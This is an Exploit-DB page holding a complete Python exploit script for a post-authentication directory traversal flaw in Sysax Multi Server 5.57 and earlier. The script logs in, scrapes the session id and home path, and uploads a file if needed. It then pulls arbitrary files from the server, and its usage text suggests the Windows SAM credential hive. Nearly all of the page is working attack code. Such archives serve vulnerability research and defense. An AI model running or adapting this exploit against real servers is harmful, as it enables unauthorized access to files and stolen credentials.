Sysax 5.57 - Directory Traversal

EDB-ID:

18695

CVE:


EDB Verified:

Author:

Craig Freyman

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2012-04-03

Vulnerable App: 
#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit
#Date Discovered: March 27, 2012
#Vendor Contacted: March 29, 2012
#Vendor Response: April 3, 2012	
#Vendor Fixed: (Currently working on fix, check my site for update)
#Details: http://www.pwnag3.com/2012/04/sysax-directory-traversal-exploit.html
##########################################################################################################

import socket,sys,time,re,base64,urllib

def main():
	#base64 encode the provided creds
	creds = base64.encodestring(user+"\x0a"+password)

	print "\n"
	print "****************************************************************************"
	print "       Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth)      "
	print "     	  	         by @cd1zz www.pwnag3.com                          "
	print "	        Getting "+getfile+" from " + target + " on port " + str(port) 
	print "****************************************************************************"

	#setup post for login
	login = "POST /scgi?sid=0&pid=dologin HTTP/1.1\r\n"
	login += "Host: \r\n"
	login += "http://"+target+"/scgi?sid=0&pid=dologin\r\n"
	login += "Content-Type: application/x-www-form-urlencoded\r\n"
	login += "Content-Length: 15\r\n\r\n"
	login += "fd="+creds+"\n\n"

	#send post and login creds
	try:
		r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		r.connect((target, port))
		print "[*] Logging in"
		r.send(login)
	except Exception, e:
		print "[-] Could not login"
		print e
	
	#loop the recv sock so we get the full page
	page = ''	
	fullpage = ''	
	while "</html>" not in fullpage:
		page = r.recv(4096)
		fullpage += page
	time.sleep(1)

	#regex the sid from the page
	global sid
	sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
	if sid is None:
		print "[x] Could not login. User and pass correct?"
		sys.exit(1)
	time.sleep(1)

	#regex to find user's path
	print "[*] Finding your home path"
	global path
	path = re.search(r'file=[a-zA-Z]:\\[\\.a-zA-Z_0-9 ]{1,255}[\\$]',fullpage,re.M)
	time.sleep(1)

	#if that doesn't work, try to upload a file and check again
	if path is None:
		print "[-] No files found, I will try to upload one for you."
		print "[-] If you don't have rights to do this, it will fail."

		upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1\r\n"
		upload += "Host:\r\n"
		upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620\r\n"
		upload += "Content-Length: 219\r\n\r\n"
		upload += "-----------------------------97336096252362005297691620\r\n"
		upload += "Content-Disposition: form-data; name=\"upload_file\"; filename=\"file.txt\"\r\n"
		upload += "Content-Type: text/plain\r\n"
		upload += "-----------------------------97336096252362005297691620--\r\n\r\n"

		u = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		u.connect((target, port))
		u.send(upload + "\r\n")
		page = ''
		fullpage = ''	
		while "</html>" not in fullpage:
			page = u.recv(4096)
			fullpage += page
		path = re.search(r'file=[a-zA-Z0-9]:\\[\\.a-zA-Z_0-9 ]{1,255}[\\$]',fullpage,re.M)
		time.sleep(2)
		if path is None:
			print "\n[x] It failed, you probably don't have rights to upload."
			print "[x] Please retry the script a few times."
			print "[x] You need at least one file in the directory because we need" 
			print "[x] to append our directory traversal to the end of your path."
			sys.exit(1)
	print "[+] Got it => " + path.group(0) 
	time.sleep(1)
	r.close()

def dirtrav():
	#here is the dir trav 
	url = "http://"+target+"/scgi?"+str(sid.group(0))+"&"+path.group(0)+"../../../../../../../"+getfile
	try:
		retrieved_file = urllib.urlopen(url)
		filename = raw_input("[+] Got your file. What file name do you want to save it as?  ")
		output = open(filename,'wb')
		output.write(retrieved_file.read())
		output.close()
		print "[*] Done!"
	except Exception, e:
		print "[x] Either the file doesn't exist or you mistyped it. Error below:"
		print "[x] You can also try to browse this site manually:"
		print "[x] " + url
		print e

def keepgoing():
	cont = raw_input("[*] Do you want another file (y/n)? ")
	while cont == "y":
		global getfile
		getfile = raw_input("[*] Enter the location of the new file: ")
		dirtrav()
		cont = raw_input("[*] Do you want another file (y/n)? ")
	else:
		sys.exit(1) 
	
if __name__ == '__main__':
	if len(sys.argv) != 6:
		print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <File>"
		print "[+] File examples => windows/repair/sam or boot.ini"
		sys.exit(1)

	target, port, user, password, getfile = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5]
	
	main()
	dirtrav()
	keepgoing()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services